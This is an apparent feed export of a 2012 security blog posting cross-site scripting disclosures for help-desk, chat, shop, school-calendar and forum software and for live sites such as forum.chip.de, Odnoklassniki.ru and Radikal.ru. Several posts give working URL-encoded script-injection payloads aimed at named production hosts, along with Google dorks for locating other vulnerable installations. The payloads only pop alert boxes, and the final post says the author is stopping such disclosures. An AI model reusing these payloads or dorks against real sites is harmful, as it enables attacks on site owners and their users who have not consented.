tag:blogger.com,1999:blog-7917994925549813172024-03-12T14:04:43.541-10:00st2teaSonyhttp://www.blogger.com/profile/07357857456568656987noreply@blogger.comBlogger118125tag:blogger.com,1999:blog-791799492554981317.post-48276874920498969982012-04-20T09:52:00.000-10:002012-04-20T09:54:11.093-10:00Closed.<div dir="ltr" style="text-align: left;" trbidi="on">
<b>Reason?</b><br />
<br />
<b><span style="color: black;"><span style="color: black; font-family: Arial; font-size: small;">I will not post any bugs in the future, because I changed my views on this and now consider it to be unethical.</span></span></b><br />
<br /></div>Sonyhttp://www.blogger.com/profile/07357857456568656987noreply@blogger.com0tag:blogger.com,1999:blog-791799492554981317.post-84734777315104794992012-04-19T08:23:00.000-10:002012-04-19T08:34:59.894-10:00ReadyDesk Cross Site Scripting<div dir="ltr" style="text-align: left;" trbidi="on">
<b># Exploit Title: ReadyDesk Cross Site Scripting</b><br />
<b># Date: 19.04.2012</b><br />
<b># Author: Sony</b><br />
<b># Software Link: http://www.readydesk.com/</b><br />
<b># Google Dorks: powered by readydesk</b><br />
<b># Web Browser : Mozilla Firefox</b><br />
<b># Blog : http://st2tea.blogspot.com</b><br />
<b># PoC:</b><br />
<b> http://st2tea.blogspot.com/2012/04/readydesk-cross-site-scripting.html</b><br />
<b>..................................................................</b><br />
<b><br /></b><br />
<b>Well, we have persistent xss in the "View Existing Tickets".</b><br />
<br />
<b>We can use Demo:</b><br />
<br />
<b>http://www.readydesk.com/demo.asp</b><br />
<b><br /></b><br />
<b>http://www.readydesk.com/rd7/customer/rdlogin.aspx (Customer Interface)</b><br />
<b><br /></b><br />
<b>But first --> Submit New Ticket (with our xss code). (i think all fields in the send form)</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-PE_xdLqvMkM/T5BX2uzXaeI/AAAAAAAABAM/WBZ-PE3JhyU/s1600/ready.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://2.bp.blogspot.com/-PE_xdLqvMkM/T5BX2uzXaeI/AAAAAAAABAM/WBZ-PE3JhyU/s320/ready.JPG" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br /></div>Sonyhttp://www.blogger.com/profile/07357857456568656987noreply@blogger.com0tag:blogger.com,1999:blog-791799492554981317.post-57057059537923948272012-04-19T00:55:00.002-10:002012-04-19T00:57:17.148-10:00ChatBlazer Flash Chat Cross Site Scripting<div dir="ltr" style="text-align: left;" trbidi="on">
<b># Exploit Title: ChatBlazer Flash Chat Cross Site Scripting<br /># Date: 19.04.2012<br /># Author: Sony<br /># Software Link: www.chatblazer.com/<br /># Web Browser : Mozilla Firefox<br /># Blog : http://st2tea.blogspot.com<br /># PoC:</b><br />
<b>http://st2tea.blogspot.com/2012/04/chatblazer-flash-chat-cross-site.html<br />.................................................................<br /><br />Well, we have cross site scripting in ChatBlazer.<br /><br />We can use Demo. (simple example)</b><br />
<br />
http://demo.chatblazer.net/cb8.5/client.php?username=%27;alert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29//\%27;alert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29//%22;alert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29//\%22;alert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2879,117,114,32,120,115,115,32,105,115,32,104,101,114,101,46,46%29%29%3C/SCRIPT%3E&password=&roomid=1009&config=config.php%3Fembed%3D0<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-7YzWcOWVNe4/T4_vKoTi96I/AAAAAAAABAE/NWNAfZTijDI/s1600/chat.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://1.bp.blogspot.com/-7YzWcOWVNe4/T4_vKoTi96I/AAAAAAAABAE/NWNAfZTijDI/s320/chat.JPG" width="320" /></a></div>
<br /></div>Sonyhttp://www.blogger.com/profile/07357857456568656987noreply@blogger.com0tag:blogger.com,1999:blog-791799492554981317.post-86052070108063762012-04-18T00:49:00.003-10:002012-04-18T00:50:58.462-10:00Fortune3 Cross Site Scripting<div dir="ltr" style="text-align: left;" trbidi="on">
<b># Exploit Title: Fortune3 Cross Site Scripting<br /># Date: 18.04.2012<br /># Author: Sony<br /># Software Link: http://www.fortune3.com/<br /># Google Dorks: Powered by FORTUNE3<br /># Web Browser : Mozilla Firefox<br /># Blog : http://st2tea.blogspot.com<br /># PoC:</b><br />
<b>http://st2tea.blogspot.com/2012/04/fortune3-cross-site-scripting.html<br />..................................................................<br /><br />Well, we have some xss in Fortune3.<br /><br />Our test with http://www.naturalab.com (simple example)<br /><br /><br />Add to cart - product what you want and open page Print Cart or Email Cart.<br /><br />Print Cart and Email Cart:<br /><br />Put our xss code in "Include a Note" and press button Continue.</b><br />
<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-i7J2jt4wp6w/T46bSEvwcnI/AAAAAAAAA_Q/eizU1buwYfY/s1600/include1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://2.bp.blogspot.com/-i7J2jt4wp6w/T46bSEvwcnI/AAAAAAAAA_Q/eizU1buwYfY/s320/include1.JPG" width="320" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-TWIqNgpQj2I/T46bmQhGGUI/AAAAAAAAA_g/W_csKjwTzvs/s1600/include2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://4.bp.blogspot.com/-TWIqNgpQj2I/T46bmQhGGUI/AAAAAAAAA_g/W_csKjwTzvs/s320/include2.JPG" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-Pc7AVUzs1s8/T46bxue61qI/AAAAAAAAA_w/8GqA_yXMXlw/s1600/email1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://2.bp.blogspot.com/-Pc7AVUzs1s8/T46bxue61qI/AAAAAAAAA_w/8GqA_yXMXlw/s320/email1.JPG" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-JLfnHjRgAzU/T46cLaYmIrI/AAAAAAAAA_4/f4hu7En8WPY/s1600/email2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://4.bp.blogspot.com/-JLfnHjRgAzU/T46cLaYmIrI/AAAAAAAAA_4/f4hu7En8WPY/s320/email2.JPG" width="320" /></a></div>
<br /></div>Sonyhttp://www.blogger.com/profile/07357857456568656987noreply@blogger.com2tag:blogger.com,1999:blog-791799492554981317.post-53970857808152837742012-04-17T11:26:00.003-10:002012-04-17T11:26:50.261-10:00Hijacking attempt [mini funny xss stuff]<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-BI6xNTGQ6DM/T43feQOUceI/AAAAAAAAA-o/5lwFEXmpb50/s1600/funny.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://3.bp.blogspot.com/-BI6xNTGQ6DM/T43feQOUceI/AAAAAAAAA-o/5lwFEXmpb50/s320/funny.JPG" width="320" /></a></div>
<br />
<br />
<b><br /></b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-m8s1anIe-Lg/T43f6TErj7I/AAAAAAAAA_I/cMZ4W8gBn5w/s1600/funny3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://4.bp.blogspot.com/-m8s1anIe-Lg/T43f6TErj7I/AAAAAAAAA_I/cMZ4W8gBn5w/s320/funny3.JPG" width="320" /></a></div>
<br /></div>Sonyhttp://www.blogger.com/profile/07357857456568656987noreply@blogger.com0tag:blogger.com,1999:blog-791799492554981317.post-57830214850168507042012-04-16T11:34:00.002-10:002012-04-16T11:52:15.392-10:00forum.chip.de xss<div dir="ltr" style="text-align: left;" trbidi="on">
http://codepad.org/2r8vW8DM<br />
<br />
<b>or</b><br />
<br />
http://forum.chip.de/newthread.php?do=newthread&f=155%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-aryB4EnpvYU/T4yOxKAtf6I/AAAAAAAAA-I/eX4PkQesqJE/s1600/CHIP.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://2.bp.blogspot.com/-aryB4EnpvYU/T4yOxKAtf6I/AAAAAAAAA-I/eX4PkQesqJE/s320/CHIP.JPG" width="320" /></a></div>
<br />
<b>O_o</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-AXpP7EYvZRY/T4yPD77ZllI/AAAAAAAAA-g/TqUmMVdUqW4/s1600/CHIP2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="202" src="http://2.bp.blogspot.com/-AXpP7EYvZRY/T4yPD77ZllI/AAAAAAAAA-g/TqUmMVdUqW4/s320/CHIP2.JPG" width="320" /></a></div>
<b>or</b><br />
<br />
http://forum.chip.de/grafikkarten/?daysprune=-1%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E&order=desc&sort=views<br />
<br />
<b>%)</b><br />
<br />
<br /></div>Sonyhttp://www.blogger.com/profile/07357857456568656987noreply@blogger.com0tag:blogger.com,1999:blog-791799492554981317.post-49915841664443584662012-04-15T06:57:00.000-10:002012-04-15T07:03:29.327-10:00Odnoklassniki.ru Cross Site Scripting<div dir="ltr" style="text-align: left;" trbidi="on">
<pre><b># Date: 15.04.2012
# Author: Sony and Flexxpoint
# Web Browser : Mozilla Firefox
# Sony Blog: http://st2tea.blogspot.com
# Flexxpoint Blog: http://flexxpoint.blogspot.com/</b></pre>
<pre><b># PoC:</b></pre>
<pre><b>http://st2tea.blogspot.com/2012/04/odnoklassnikiru-cross-site-scripting.html</b></pre>
<pre><b>..................................................................</b></pre>
<pre><b> </b></pre>
<pre><b>Well, we have a cross site scripting on Odnoklassniki.ru</b></pre>
<pre><b> </b></pre>
<pre><b>http://www.odnoklassniki.ru/dk?st.cmd=appSearchResultList&st.isEmpty=off&st.query=%22%22%3E%3Cscript%3Ealert%28%22Odnoklassniki.ru%20Cross%20Site%20Scripting%22%29%3C/script%3E%3Ciframe%20src=%22http://xssed.com%22%3E</b></pre>
<pre><b> </b></pre>
<pre><b>or</b></pre>
<pre><b> </b></pre>
<pre><b>http://codepad.org/kKjrrn76</b></pre>
<pre> </pre>
<pre></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-HP_JgxRPiOw/T4r6Dh8lNwI/AAAAAAAAA9o/lAKOP1w9MrI/s1600/odnoklass1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://3.bp.blogspot.com/-HP_JgxRPiOw/T4r6Dh8lNwI/AAAAAAAAA9o/lAKOP1w9MrI/s320/odnoklass1.JPG" width="320" /></a></div>
<pre></pre>
<pre></pre>
<pre></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-FmPWpbL1PjA/T4r6lsBQHfI/AAAAAAAAA-A/MuoujKKB-6U/s1600/odnoklass2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://3.bp.blogspot.com/-FmPWpbL1PjA/T4r6lsBQHfI/AAAAAAAAA-A/MuoujKKB-6U/s320/odnoklass2.JPG" width="320" /></a></div>
<br />
<pre></pre>
<br />
<br />
<pre></pre>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/PFB-oVstfFI?feature=player_embedded' frameborder='0'></iframe></div>
<pre></pre>
<br />
<pre></pre>
</div>Sonyhttp://www.blogger.com/profile/07357857456568656987noreply@blogger.com2tag:blogger.com,1999:blog-791799492554981317.post-72974560548112360892012-04-15T02:23:00.002-10:002012-04-15T02:25:32.768-10:00HelpDen Cross Site Scripting<div dir="ltr" style="text-align: left;" trbidi="on">
<pre><b># Exploit Title: HelpDen Cross Site Scripting
# Date: 15.04.2012
# Author: Sony
# Software Link: http://www.helpden.com/
# Google Dorks:inurl:.helpden.com/leavemessage.php?code
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/04/helpden-cross-site-scripting.html
..................................................................</b></pre>
<pre><b> </b></pre>
<pre><b>We have a simple xss in HelpDen.</b></pre>
<pre><b> </b></pre>
<pre><b>Our xss is here:</b></pre>
<pre><b> </b></pre>
<pre><b>https://url_name/leavemessage.php?code=[our xss]
</b></pre>
<pre><b> </b></pre>
<pre><b>https://admin.helpden.com/leavemessage.php?code=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E</b></pre>
<pre><b> </b></pre>
<pre><b>or </b></pre>
<pre><b> </b></pre>
<pre><b>http://codepad.org/wiyno0Wx</b></pre>
<pre> </pre>
<pre></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-7r-YUfezNLo/T4q9g7ZknoI/AAAAAAAAA9g/bfNmth8BH7w/s1600/helpden.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://3.bp.blogspot.com/-7r-YUfezNLo/T4q9g7ZknoI/AAAAAAAAA9g/bfNmth8BH7w/s320/helpden.JPG" width="320" /></a></div>
<pre></pre>
<pre></pre>
<pre></pre>
<pre></pre>
<pre></pre>
<pre></pre>
</div>Sonyhttp://www.blogger.com/profile/07357857456568656987noreply@blogger.com0tag:blogger.com,1999:blog-791799492554981317.post-37527307637415052862012-04-15T00:13:00.000-10:002012-04-15T00:34:06.523-10:00Radikal.ru Cross Site Scripting<div dir="ltr" style="text-align: left;" trbidi="on">
<pre><b># Date: 15.04.2012</b></pre>
<pre><b># Author: Sony</b></pre>
<pre><b># Web Browser : Mozilla Firefox</b></pre>
<pre><b># Site: http://insecurity.ro </b></pre>
<pre><b># PoC: </b></pre>
<pre><b> </b></pre>
<pre><b>http://st2tea.blogspot.com/2012/04/radikalru-cross-site-scripting.html </b></pre>
<pre><b>..................................................................</b></pre>
<pre><b> </b></pre>
<pre><b>Well, we have a cross site scripting on Radikal.ru</b></pre>
<pre><b> </b></pre>
<pre><b>What is Radikal.ru?</b></pre>
<pre><b> </b></pre>
<pre><b>http://ru.wikipedia.org/wiki/Radikal.ru</b></pre>
<pre><b> </b></pre>
<pre><b>We have a multiple xss vuln..</b></pre>
<pre><b> </b></pre>
<pre><b>But i put only one in the archive. Because it's a simple for use.</b></pre>
<pre><b> </b></pre>
<pre><b>http://www.radikal.ru/GALLERY/PageGallery.aspx?pg=258&period=022008%22%22%3E%3Cscript%3Ealert%28%22Radikal.ru%20Cross%20Site%20Scripting%22%29%3C/script%3E&id_gallery=-1 </b></pre>
<pre><b> </b></pre>
<pre><b>or </b></pre>
<pre><b> </b></pre>
<pre><b>http://codepad.org/qiZsoABI</b></pre>
<pre></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-b3-RxxTrWR4/T4qfAbsLZGI/AAAAAAAAA8o/30tC1E6of44/s1600/radikal.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://2.bp.blogspot.com/-b3-RxxTrWR4/T4qfAbsLZGI/AAAAAAAAA8o/30tC1E6of44/s320/radikal.JPG" width="320" /></a></div>
<br />
<pre></pre>
<br />
<b><br /></b><br />
<pre><b>Where is other xss on radikal.ru?</b></pre>
<pre><b>Use login..;) You can see in the edit pics, etc..</b></pre>
<pre><b>It's a simple. </b></pre>
<pre> </pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-eaRkTzNVLDI/T4qh7TfDtxI/AAAAAAAAA9A/TXClm8UC2mY/s1600/radikal1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://4.bp.blogspot.com/-eaRkTzNVLDI/T4qh7TfDtxI/AAAAAAAAA9A/TXClm8UC2mY/s320/radikal1.JPG" width="320" /></a></div>
<pre> </pre>
<pre> </pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-LCm8g-A_70g/T4qkENJXw3I/AAAAAAAAA9Y/PHD4_DjpHos/s1600/radikal3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://1.bp.blogspot.com/-LCm8g-A_70g/T4qkENJXw3I/AAAAAAAAA9Y/PHD4_DjpHos/s320/radikal3.JPG" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<pre> </pre>
<pre></pre>
<pre></pre>
</div>Sonyhttp://www.blogger.com/profile/07357857456568656987noreply@blogger.com0tag:blogger.com,1999:blog-791799492554981317.post-45579392806065434442012-04-11T06:57:00.001-10:002012-04-11T07:01:17.376-10:00SchoolCenter Web Tools Version 11.0.27 Cross Site Scripting<div dir="ltr" style="text-align: left;" trbidi="on">
<b># Exploit Title: SchoolCenter Web Tools Version 11.0.27 Cross Site Scripting</b><br />
<b># Date: 11.04.2012</b><br />
<b># Author: Sony and Flexxpoint</b><br />
<b># Software Link: www.thinqed.com</b><br />
<b># Google Dorks: inurl:/education/components/calendar/ site:edu</b><br />
<b># Web Browser : Mozilla Firefox</b><br />
<b># Site : http://insecurity.ro</b><br />
<b># PoC: </b><br />
<b>http://st2tea.blogspot.com/2012/04/schoolcenter-web-tools-version-11027.html</b><br />
<b>..................................................................</b><br />
<b><br /></b><br />
<b>Well, we have xss in calendar.</b><br />
<b><br /></b><br />
<b>Demo:</b><br />
<br />
<br />
http://schoolctr.hebisd.edu/education/components/calendar/default.php?sectiondetailid=74&my_family=&d=4&m=4&y=2012&et=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3Eday<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-iUHFDKmBpO8/T4W34sQCX4I/AAAAAAAAA8g/uKfMF4sIUrQ/s1600/xss.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://4.bp.blogspot.com/-iUHFDKmBpO8/T4W34sQCX4I/AAAAAAAAA8g/uKfMF4sIUrQ/s320/xss.JPG" width="320" /></a></div>
<br />
<br />
<b>etc..</b></div>Sonyhttp://www.blogger.com/profile/07357857456568656987noreply@blogger.com0tag:blogger.com,1999:blog-791799492554981317.post-11299532717758026942012-04-09T04:14:00.000-10:002012-04-09T04:19:44.278-10:00Nimbuzz 2.2.0 Cross Site Scripting<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<pre><b># Exploit Title: Nimbuzz 2.2.0 Cross Site Scripting
# Date: 09.04.2012
# Author: Sony
# Software Link: http://www.nimbuzz.com/en/get/voip-and-chat-on-pc/pc-client-downloaded
# Software Version: 2.2.0
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/04/nimbuzz-220-cross-site-scripting.html
..................................................................</b></pre>
<pre><b> </b></pre>
<pre><b>Well, we have xss in the messenger, interesting place for xss)</b></pre>
<pre><b> </b></pre>
<pre> </pre>
<pre></pre>
<pre></pre>
<pre></pre>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-oZCtF5p8yPg/T4LmoWSfz-I/AAAAAAAAA8A/NwcttC0s4c0/s1600/ni.png" imageanchor="1"><img border="0" height="240" src="http://1.bp.blogspot.com/-oZCtF5p8yPg/T4LmoWSfz-I/AAAAAAAAA8A/NwcttC0s4c0/s400/ni.png" width="219" /></a></div>
<div dir="ltr" style="text-align: left;" trbidi="on">
</div>
</div>
<b>We have xss in the Chat Window-->View in Browser. (persistent code)
Some pics and video PoC: </b><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-lDyKyFhqWiU/T4LqFhg9LQI/AAAAAAAAA8M/Mc7FcodbdPM/s1600/nim.JPG" imageanchor="1"><img border="0" height="300" src="http://4.bp.blogspot.com/-lDyKyFhqWiU/T4LqFhg9LQI/AAAAAAAAA8M/Mc7FcodbdPM/s400/nim.JPG" width="400" /></a></div>
<br />
<iframe width="420" height="315" src="http://www.youtube.com/embed/t8mC6Oceq0Y" frameborder="0" allowfullscreen></iframe>
<br />
<br />
<b>And where is forget password: </b><br />
<br />
<br />
http://www.nimbuzz.com/webchat_login?lang=en&step=2&login=error
http://www.nimbuzz.com/webchat_login?lang=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-LXxT4HBs80A/T4Lu1IdlbaI/AAAAAAAAA8Y/YyCzOcyh76I/s1600/nimb2.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="300" src="http://2.bp.blogspot.com/-LXxT4HBs80A/T4Lu1IdlbaI/AAAAAAAAA8Y/YyCzOcyh76I/s400/nimb2.JPG" width="400" /></a></div>
</div>Sonyhttp://www.blogger.com/profile/07357857456568656987noreply@blogger.com0tag:blogger.com,1999:blog-791799492554981317.post-61680881694266320112012-04-06T22:37:00.000-10:002012-04-06T23:01:28.598-10:00eBuddy.com Cross Site Scripting<div dir="ltr" style="text-align: left;" trbidi="on">
<pre><b># Date: 07.04.2012
# Author: Sony
# Web Browser : Mozilla Firefox
# Sony Blog: http://st2tea.blogspot.com
..................................................................</b></pre>
<pre> </pre>
<pre>http://codepad.org/t278Y5Qo</pre>
<pre> </pre>
<pre> </pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-1Ptjrg6ep6I/T3_8g4SK2jI/AAAAAAAAA7s/QWF5UwvxN8A/s1600/hello.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://2.bp.blogspot.com/-1Ptjrg6ep6I/T3_8g4SK2jI/AAAAAAAAA7s/QWF5UwvxN8A/s320/hello.JPG" width="320" /></a></div>
<pre> </pre>
<pre> </pre>
<pre> </pre>
<pre> </pre>
<pre> </pre>
<pre> </pre>
</div>Sonyhttp://www.blogger.com/profile/07357857456568656987noreply@blogger.com0tag:blogger.com,1999:blog-791799492554981317.post-67437637693655450112012-04-06T11:16:00.001-10:002012-04-17T12:04:33.502-10:00Website Toolbox Cross Site Scripting<div dir="ltr" style="text-align: left;" trbidi="on">
<b># Exploit Title: Website Toolbox Cross Site Scripting</b><br />
<b># Date: 7.04.2012</b><br />
<b># Author: Sony</b><br />
<b># Software Link: http://websitetoolbox.com</b><br />
<b># Web Browser : Mozilla Firefox</b><br />
<b># Site : http://insecurity.ro</b><br />
<b># PoC:
http://st2tea.blogspot.com/2012/04/website-toolbox-cross-site-scripting.html </b><br />
<br />
<b>..................................................................</b><br />
<br />
<b>Well, we have a multiple cross site scripting vulnerabilities.</b><br />
<b><br /></b><br />
<b>Simple examples:</b><br />
<br />
http://greentea.websitetoolbox.com/register?s_username=&s_email=&s_im=%22%22%3E%3Cscript%3Ealert%28%22hello%22%29%3C%2Fscript%3E&s_regafter_month=&s_regafter_day=&s_regafter_year=&s_regbefore_month=&s_regbefore_day=&s_regbefore_year=&last_post_date_after_month=&last_post_date_after_day=&last_post_date_after_year=&last_post_date_before_month=&last_post_date_before_day=&last_post_date_before_year=&lastvisit_month_after=&lastvisit_day_after=&lastvisit_year_after=&lastvisit_month_before=&lastvisit_day_before=&lastvisit_year_before=&s_postsgreater=&s_postsless=&field240875=&field240876=&field240877=&field240878=&birthday_after_month=&birthday_after_day=&birthday_after_year=&birthday_before_month=&birthday_before_day=&birthday_before_year=&ip_address=&usergroupid=&Submit=Search&fieldid_fields=240875%2C240876%2C240877%2C240878%2C&action=members&search=true<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-A38gvC86vAg/T39cGxuC9kI/AAAAAAAAA7M/5HDUkPTTFXo/s1600/1.JPG" imageanchor="1"><img border="0" height="300" src="http://3.bp.blogspot.com/-A38gvC86vAg/T39cGxuC9kI/AAAAAAAAA7M/5HDUkPTTFXo/s400/1.JPG" width="400" /></a></div>
<br />
<br />
http://www.websitetoolbox.com/cgi/members/mb_admins.cgi?action=moderatorlogs&type=calendar_logs%22%22%3E%3Cscript%3Ealert%28%22hello%22%29%3C/script%3E<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-ST7U4os6-tc/T39cMgf7GTI/AAAAAAAAA7Y/PSjqyP8xeAg/s1600/2.JPG" imageanchor="1"><img border="0" height="300" src="http://3.bp.blogspot.com/-ST7U4os6-tc/T39cMgf7GTI/AAAAAAAAA7Y/PSjqyP8xeAg/s400/2.JPG" width="400" /></a></div>
<br />
<br />
http://greentea.websitetoolbox.com/register/register?edit=1&userid=1885232%22%22%3E%3Cscript%3Ealert%28%22hello%22%29%3C/script%3E<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-PV32u8rqwo0/T39cTEYmXZI/AAAAAAAAA7k/VZbHyamwQts/s1600/3.JPG" imageanchor="1"><img border="0" height="300" src="http://4.bp.blogspot.com/-PV32u8rqwo0/T39cTEYmXZI/AAAAAAAAA7k/VZbHyamwQts/s400/3.JPG" width="400" /></a></div>
<br />
<b><br /></b><br />
<b>etc..</b><br />
</div>Sonyhttp://www.blogger.com/profile/07357857456568656987noreply@blogger.com0tag:blogger.com,1999:blog-791799492554981317.post-6277153610659716122012-03-27T03:48:00.003-10:002012-03-27T08:07:16.161-10:00IP.Board Addon IP.Gallery 4.2.1Cross Site Scripting<b># Exploit Title: IP.Board Addon IP.Gallery 4.2.1Cross Site Scripting <br />
# Date: 27.03.2012<br />
# Author: Sony and Flexxpoint</b><br />
<b># Software Link:</b> http://community.invisionpower.com/<br />
<b># Web Browser : Mozilla Firefox</b><br />
<b># Blog Flexxpoint:</b> http://flexxpoint.blogspot.com/<br />
<b># Blog Sony:</b> http://st2tea.blogspot.com<br />
<b># Site :</b> http://insecurity.ro<br />
<b># PoC:</b> <br />
http://st2tea.blogspot.com/2012/03/ipboard-330-cross-site-scripting.html<br />
<b>..................................................................</b><br />
<br />
<b>Xss bug in Gallery Search.<br />
<br />
It's a very simple xss, but hard to use this.</b> <br />
<br />
